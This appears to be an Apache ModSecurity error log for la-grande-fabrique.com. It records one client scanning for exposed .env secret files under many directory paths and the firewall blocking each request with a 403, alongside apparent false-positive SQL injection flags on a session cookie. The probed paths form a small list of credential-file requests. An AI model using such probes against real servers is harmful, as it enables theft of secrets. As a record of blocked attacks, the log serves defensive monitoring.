[Mon May 11 14:09:54.752106 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/api/.env"] [unique_id "agHHElchVQ3tCn0m9OpAtAAAAQ4"]
[Mon May 11 14:09:54.752292 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/api/.env"] [unique_id "agHHElchVQ3tCn0m9OpAtAAAAQ4"]
[Mon May 11 14:09:54.752512 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/api/.env"] [unique_id "agHHElchVQ3tCn0m9OpAtAAAAQ4"]
[Mon May 11 14:09:54.951658 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/web/.env"] [unique_id "agHHElchVQ3tCn0m9OpAtQAAAQ4"]
[Mon May 11 14:09:54.952051 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/web/.env"] [unique_id "agHHElchVQ3tCn0m9OpAtQAAAQ4"]
[Mon May 11 14:09:54.952246 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/web/.env"] [unique_id "agHHElchVQ3tCn0m9OpAtQAAAQ4"]
[Mon May 11 14:09:54.952501 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/web/.env"] [unique_id "agHHElchVQ3tCn0m9OpAtQAAAQ4"]
[Mon May 11 14:09:55.064574 2026] [core:error] [pid 1319953:tid 1319978] [client 52.242.216.199:59559] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:55.064607 2026] [core:error] [pid 1319953:tid 1319978] [client 52.242.216.199:59559] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:55.214800 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/site/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAtwAAAQ4"]
[Mon May 11 14:09:55.215187 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/site/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAtwAAAQ4"]
[Mon May 11 14:09:55.215381 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/site/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAtwAAAQ4"]
[Mon May 11 14:09:55.215622 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/site/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAtwAAAQ4"]
[Mon May 11 14:09:55.511985 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/public/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAuQAAAQ4"]
[Mon May 11 14:09:55.512386 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/public/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAuQAAAQ4"]
[Mon May 11 14:09:55.512568 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/public/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAuQAAAQ4"]
[Mon May 11 14:09:55.512811 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/public/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAuQAAAQ4"]
[Mon May 11 14:09:55.681003 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/admin/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAuwAAAQ4"]
[Mon May 11 14:09:55.681387 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/admin/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAuwAAAQ4"]
[Mon May 11 14:09:55.681571 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/admin/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAuwAAAQ4"]
[Mon May 11 14:09:55.681793 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/admin/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAuwAAAQ4"]
[Mon May 11 14:09:55.883831 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/backend/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAvAAAAQ4"]
[Mon May 11 14:09:55.884265 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/backend/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAvAAAAQ4"]
[Mon May 11 14:09:55.884484 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/backend/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAvAAAAQ4"]
[Mon May 11 14:09:55.884760 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/backend/.env"] [unique_id "agHHE1chVQ3tCn0m9OpAvAAAAQ4"]
[Mon May 11 14:09:56.092646 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/server/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAvgAAAQ4"]
[Mon May 11 14:09:56.093059 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/server/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAvgAAAQ4"]
[Mon May 11 14:09:56.093264 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/server/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAvgAAAQ4"]
[Mon May 11 14:09:56.093602 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/server/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAvgAAAQ4"]
[Mon May 11 14:09:56.332249 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/frontend/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAwAAAAQ4"]
[Mon May 11 14:09:56.332700 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/frontend/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAwAAAAQ4"]
[Mon May 11 14:09:56.332899 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/frontend/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAwAAAAQ4"]
[Mon May 11 14:09:56.333241 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/frontend/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAwAAAAQ4"]
[Mon May 11 14:09:56.564985 2026] [core:error] [pid 1319886:tid 1319916] [client 52.242.216.199:59565] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:56.565100 2026] [core:error] [pid 1319886:tid 1319916] [client 52.242.216.199:59565] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:56.580419 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/src/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAwgAAAQ4"]
[Mon May 11 14:09:56.580753 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/src/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAwgAAAQ4"]
[Mon May 11 14:09:56.580918 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/src/.env"] [unique_id "agHHFFchVQ3tCn0m9OpAwgAAAQ4"]
